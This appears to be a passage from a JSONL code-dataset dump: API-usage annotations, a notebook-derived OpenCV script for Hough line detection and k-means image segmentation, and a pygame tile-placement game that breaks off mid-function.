{"api_name": "tensorflow.data", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 143, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 211, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 222, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 239, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 241, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 252, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 258, "usage_type": "call"}, {"api_name": "time.time", "line_number": 262, "usage_type": "call"}, {"api_name": "time.time", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 270, "usage_type": "call"}, {"api_name": "time.time", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 274, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 284, "usage_type": "attribute"}, {"api_name": "numpy.cumsum", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 313, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 327, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 380, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 394, "usage_type": "attribute"}, {"api_name": "numpy.square", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 402, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 406, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 409, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 421, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 422, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 444, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 448, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 449, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 449, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 485, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 485, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 496, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 499, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 510, "usage_type": "attribute"}, {"api_name": "numpy.square", "line_number": 511, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 519, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 527, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 528, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 530, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 541, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 541, "usage_type": "attribute"}, {"api_name": "tensorflow.eye", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 566, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 566, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 566, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 569, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 572, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 577, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 580, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.ones", "line_number": 583, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 585, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 585, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 585, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 586, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 586, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 587, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 588, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 590, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 590, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 592, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 593, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 595, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 595, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 600, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 601, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 603, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 606, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 618, "usage_type": "attribute"}, {"api_name": "tensorflow.random.uniform", "line_number": 620, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 620, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 624, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 624, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 624, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 626, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 626, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 629, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 638, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 638, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 649, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 650, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 651, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 651, "usage_type": "attribute"}, {"api_name": "tensorflow.cond", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 657, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 657, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 658, "usage_type": "call"}, {"api_name": "tensorflow.cond", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 664, "usage_type": "attribute"}, {"api_name": "tensorflow.fill", "line_number": 665, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 666, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 678, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 678, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 680, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 684, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 703, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 705, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 705, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 710, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 710, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 712, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 717, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 724, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 724, "usage_type": "call"}, {"api_name": "tensorflow.TensorShape", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 727, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 733, "usage_type": "call"}, {"api_name": "tensorflow.cond", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 736, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 743, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 744, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 749, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 750, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 751, "usage_type": "call"}, {"api_name": "tensorflow.map_fn", "line_number": 753, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 753, "usage_type": "attribute"}, {"api_name": "ops.get_tf_func", "line_number": 774, "usage_type": "call"}, {"api_name": "ops.get_tf_func", "line_number": 775, "usage_type": "call"}, {"api_name": "tensorflow.reduce_min", "line_number": 778, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 779, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 779, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 780, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 794, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 794, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 820, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 820, "usage_type": "attribute"}, {"api_name": "ops.get_tf_func", "line_number": 849, "usage_type": "call"}, {"api_name": "ops.get_tf_func", "line_number": 850, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 869, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 869, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 888, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 888, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 915, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 919, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 921, "usage_type": "call"}]} +{"seq_id": "28328714388", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport math\n\n\n# ## Hough Transformation\n\n# In[13]:\n\n\n# Read image \nimg = cv2.imread('campo1.jpg', cv2.IMREAD_COLOR) # road.png is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=120, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(img, (x1, y1), (x2, y2), (255,165,0), 3)\n# Show result\ncv2.imwrite(\"h1.jpg\", img)\n\n\n# \n\n# In[2]:\n\n\n# Read image \nimg = cv2.imread('campo2.jpg', cv2.IMREAD_COLOR) # road.png is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=100, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(img, (x1, y1), (x2, y2), (0,165,255), 3)\n# Show result\ncv2.imwrite(\"h2.jpg\", img)\n\n\n# \n\n# In[22]:\n\n\n# Read image \nimg = cv2.imread('campo3.jpg', cv2.IMREAD_COLOR) # road.png is the filename\n# Convert the image to gray-scale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Find the edges in the image using canny detector\nedges = cv2.Canny(gray, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=120, minLineLength=10, maxLineGap=250)\n# Draw lines on the image\nfor line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(img, (x1, y1), (x2, y2), (0,165,255), 2)\n# Show result\ncv2.imwrite(\"h3.jpg\", img)\n\n\n# \n\n# ## Defining the Hough transformation function \n\n# In[24]:\n\n\ndef hough_trans(image_in, image_out,thresh=100, color=(0,0,0), line_thickness=3):\n # Read image \n img = cv2.imread(image_in, cv2.IMREAD_COLOR) # road.png is the filename\n # Convert the image to gray-scale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Find the edges in the image using canny detector\n edges = cv2.Canny(gray, 50, 200)\n # Detect points that form a line\n lines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=thresh, minLineLength=10, maxLineGap=250)\n # Draw lines on the image\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(img, (x1, y1), (x2, y2), color, 3)\n # Show result\n cv2.imwrite(image_out, img)\n\n\n# In[25]:\n\n\nhough_trans(\"campo1.jpg\",\"test.jpg\")\n\n\n# ## K means for image segmentation \n\n# In[3]:\n\n\nimg = cv2.imread('frutas.jpg',cv2.IMREAD_COLOR)\nZ = img.reshape((-1,3))\nZ = np.float32(Z) \n# define criteria, number of clusters(K) and apply kmeans()\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\nK = 10\nret,label,center=cv2.kmeans(Z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n \n# Now convert back into uint8, and make original image\ncenter = np.uint8(center)\nres = center[label.flatten()]\nres2 = res.reshape((img.shape))\nlabel = label.reshape((img.shape[0],img.shape[1])) \ncv2.imshow('res2',res2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimg.shape\n\n\n# ## Extracting clusters from segmented image \n# \n# Apple and orange both share labels from the same cluster\n\n# In[5]:\n\n\ndef extractCluster(image,label_image,label):\n component=np.zeros(image.shape,np.uint8)\n component[label_image==label]=image[label_image==label]\n return component\n\n\n# In[6]:\n\n\nextracted=extractCluster(img,label,0)\nextracted.shape\ncv2.imwrite('apple.jpg',extracted)\ncv2.imshow('res2',extracted)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# \n\n# In[ ]:\n\n\n\n\n", "repo_name": "Tepi994/text-mining-computer-vision", "sub_path": "HT4_HOUGH/Hough_Transformation.py", "file_name": "Hough_Transformation.py", "file_ext": "py", "file_size_in_byte": 3848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 115, "usage_type": "attribute"}, {"api_name": "cv2.kmeans", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.KMEANS_RANDOM_CENTERS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 120, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 143, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 154, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "33683858727", "text": "\nimport pygame as pg\nfrom math import cos, sin, sqrt, pi\nimport sys\n\n\nCOLORS = [(0, 0, 255), (255, 255, 255), (255, 165, 0),\n (0, 128, 0), (255, 255, 0), (255, 0, 0)]\nSIZE = 50\nFPS = 60\nROTATE_ANGLE = 60\nBACKGROUND_COLOR = \"grey30\"\n\n\nclass App:\n\n def __init__(self):\n pg.init()\n\n # Set the height and width of the screen\n screen_width = 800\n screen_height = 500\n self.screen = pg.display.set_mode([screen_width, screen_height])\n\n self.screen.fill(BACKGROUND_COLOR)\n\n self.clock = pg.time.Clock()\n self.game = Game(self)\n\n def update(self):\n self.game.update()\n self.clock.tick(FPS)\n\n def draw(self):\n self.game.draw()\n pg.display.flip()\n\n def check_events(self):\n for event in pg.event.get():\n if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n pg.quit()\n sys.exit()\n\n if event.type == pg.MOUSEBUTTONDOWN:\n self.game.mouse_click(pg.mouse.get_pos())\n\n if event.type == pg.KEYDOWN and self.game.player.tile != None:\n if event.key == pg.K_RIGHT:\n self.game.player.tile.rotate_right()\n if event.key == pg.K_LEFT:\n self.game.player.tile.rotate_left()\n if event.key == pg.K_SPACE:\n self.game.player.tile.flip()\n\n def run(self):\n while True:\n self.check_events()\n self.update()\n self.draw()\n\n\nclass Game():\n def __init__(self, app):\n self.app = app\n self.player = Player()\n self.tiles_group = pg.sprite.Group()\n self.player_group = pg.sprite.GroupSingle()\n\n def update(self):\n self.player.can_drop = self.collision_test()\n self.player.update()\n\n def draw(self):\n self.app.screen.fill(BACKGROUND_COLOR)\n self.tiles_group.draw(self.app.screen)\n self.player_group.draw(self.app.screen)\n\n def collision_test(self):\n if self.player.tile == None:\n return False\n\n collide = pg.sprite.spritecollide(\n self.player.tile, self.tiles_group, False, pg.sprite.collide_mask)\n return len(collide) == 0\n\n def mouse_click(self, mouse_pos):\n if self.player.tile:\n tile = self.player.generate_new_tile()\n self.tiles_group.add(tile)\n self.player_group.empty()\n self.player.tile = None\n return\n\n if self.app.screen.get_at(mouse_pos) != pg.color.Color(BACKGROUND_COLOR):\n for tile in self.tiles_group:\n pos_in_mask = mouse_pos[0] - \\\n tile.rect.x, mouse_pos[1] - tile.rect.y\n touching = tile.rect.collidepoint(\n *mouse_pos) and tile.tile_mask.get_at(pos_in_mask)\n if touching:\n # grab existing tile\n self.player.tile = tile\n self.tiles_group.remove(tile)\n self.player_group.add(self.player.tile)\n return\n else:\n # create a new player\n self.player.tile = Tile()\n self.player_group.add(self.player.tile)\n\n\nclass Player():\n\n def __init__(self):\n self.tile: Tile = None\n self.can_drop = True\n\n def generate_new_tile(self):\n tile = Tile()\n tile.update_surface(self.tile.rot, self.tile.flipped)\n tile.rect = self.tile.rect.copy()\n return tile\n\n def update(self):\n if self.tile == None:\n return\n\n self.tile.update_surface(\n self.tile.rot, self.tile.flipped)\n pos = pg.mouse.get_pos()\n self.tile.rect.x = pos[0]\n self.tile.rect.y = pos[1]\n\n offset_x = self.tile.image.get_size()[0] - self.tile.rect.size[0]\n offset_y = self.tile.image.get_size()[1] - self.tile.rect.size[1]\n self.tile.rect.center = (self.tile.rect.x - offset_x / 2,\n self.tile.rect.y - offset_y / 2)\n\n\nclass Tile(pg.sprite.Sprite):\n\n def __repr__(self) -> str:\n return f\"Rot:{self.rot}, flipped:{self.flipped}, image: {self.image}\"\n\n def __init__(self):\n\n super().__init__()\n\n self.rot = 0\n self.flipped = False\n\n self.update_surface(self.rot, self.flipped)\n self.image_orig = self.image.copy()\n self.tile_mask = pg.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\n\n def generate_image_copy(self):\n image = self.image_orig.copy()\n image = pg.transform.rotate(image, self.rot)\n image = pg.transform.flip(image, self.flipped, False)\n return image\n\n def update_surface(self, rotation=0, flip=False):\n\n image = pg.Surface((SIZE * 3.1, SIZE * 2.3), pg.SRCALPHA)\n image.fill(\"pink\")\n\n pg.draw.polygon(image, COLORS[rotation//60], Tile.draw_hat(\n image.get_width() / 2, image.get_height() / 4.5))\n\n pg.draw.lines(image, \"purple\" if flip else \"grey\", True, Tile.draw_hat(\n image.get_width() / 2, 